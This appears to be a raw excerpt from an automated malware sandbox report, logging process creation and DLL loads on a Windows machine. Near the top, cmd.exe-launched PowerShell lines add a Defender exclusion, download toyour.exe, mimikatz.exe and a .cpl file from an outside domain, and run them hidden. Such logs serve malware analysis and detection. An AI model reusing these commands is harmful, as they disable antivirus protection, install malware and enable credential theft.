Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=5552 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceuserer --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2492,i,5569571276666808665,13576113536131478369,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\\WinXRAR
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
